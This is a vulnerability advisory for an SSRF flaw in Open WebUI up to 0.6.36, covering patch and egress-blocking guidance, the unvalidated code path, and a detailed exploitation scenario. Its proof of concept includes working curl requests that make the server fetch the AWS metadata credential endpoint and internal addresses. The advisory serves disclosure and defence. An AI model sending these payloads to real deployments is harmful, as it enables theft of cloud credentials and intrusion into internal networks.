AI Threat Alert
Any authenticated Open WebUI user can force your server to fetch cloud metadata endpoints (AWS/GCP/Azure IAM credentials), internal databases, and private network services—no admin rights required. If running Open WebUI in a cloud environment, treat IAM credentials as potentially compromised. Patch to 0.6.37 immediately; if blocked, deny egress to 169.254.169.254 and RFC1918 ranges from the Open WebUI container and disable the /api/v1/retrieval/process/web endpoint at your WAF.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| open-webui | pip | <= 0.6.36 | 0.6.37 |
Do you use open-webui? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774). 2. WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy. 3. NETWORK EGRESS: Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups. 4. CLOUD FORENSICS: Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed. 5. DETECTION: Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs. 6. ACCESS REVIEW: Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
### Summary A Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. ### Details The vulnerability exists in the /api/v1/retrieval/process/web endpoint located in backend/open_webui/routers/retrieval.py at lines 1758-1767. Vulnerable code: @router.post("/process/web") def process_web( request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user) ): try: collection_name = form_data.collection_name if not collection_name: collection_name = calculate_sha256_string(form_data.url)[:63] content, docs = get_content_from_url(request, form_data.url) # ← SSRF vulnerability The form_data.url parameter is passed directly to get_content_from_url() without any validation. This function chain ultimately calls web loaders that fetch arbitrary URLs: Call chain: 1. retrieval.py:1767 → get_content_from_url(request, form_data.url) 2. retrieval/utils.py:77 → get_loader(request, url) 3. retrieval/utils.py:62 → get_web_loader(url, ...) or YoutubeLoader(url, ...) 4. Both loaders fetch the user-supplied URL without validation No validation is performed for: - Private IP ranges (RFC1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) - Localhost addresses (127.0.0.0/8) - Cloud metadata endpoints (169.254.169.254, fd00:ec2::254) - Protocol restrictions (file://, gopher://, etc.) - Domain allowlisting ### PoC Prerequisites: Valid user account (any role) Step 1 - Authenticate: TOKEN=$(curl -s "http://localhost:3000/api/v1/auths/signin" \ -H 'Content-Type: application/json' \ -d '{"email":"user@example.com","password":"password"}' \ | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") Step 2 - Basic SSRF Test (external URL): curl -s "http://localhost:3000/api/v1/retrieval/process/web" \ -H "Authorization: Bearer $TOKEN" \ -H 'Content-Type: application/json' \ -d '{"url":"http://example.com"}' Result: Server fetches example.com and returns its content, proving the vulnerability. { "status": true, "file": { "data": { "content": "Example Domain This domain is for use in documentation..." } } } Step 3 - Advanced Attack (AWS metadata): curl -s "http://localhost:3000/api/v1/retrieval/process/web" \ -H "Authorization: Bearer $TOKEN" \ -H 'Content-Type: application/json' \ -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}' Result: Server exposes cloud credentials if running on AWS/GCP/Azure. Other attack examples: - Internal network: {"url":"http://192.168.1.1"} - Localhost services: {"url":"http://localhost:5432"} - Internal APIs: {"url":"http://internal-api.local"} ### Impact Who is affected: All authenticated users (no special permissions required) Attack capabilities: 1. Cloud Environment Compromise - Steal AWS/GCP/Azure credentials via metadata endpoints - Result: Full cloud account takeover 2. Internal Network Access - Bypass firewalls to access internal services (databases, admin panels, APIs) - Port scan and map internal infrastructure - Result: Complete network visibility 3. Data Exfiltration - Read internal documentation, configurations, secrets - Access Kubernetes API servers - Result: Credential theft, API key exposure
Exploitation Scenario
An insider threat or attacker with a compromised standard user account authenticates to the corporate Open WebUI deployment. They POST to /api/v1/retrieval/process/web with payload {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}, targeting the AWS instance metadata service. The Open WebUI server fetches the URL server-side and returns the IAM role name in the response. A follow-up request to the role-specific endpoint returns AccessKeyId, SecretAccessKey, and Token in plaintext. The attacker exports these credentials to their own system and uses AWS CLI to enumerate S3 buckets, access RDS snapshots, or assume higher-privileged roles—achieving full cloud account takeover. Total time from login to cloud credential exfiltration: under 5 minutes. Minimal application-layer forensic trace.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N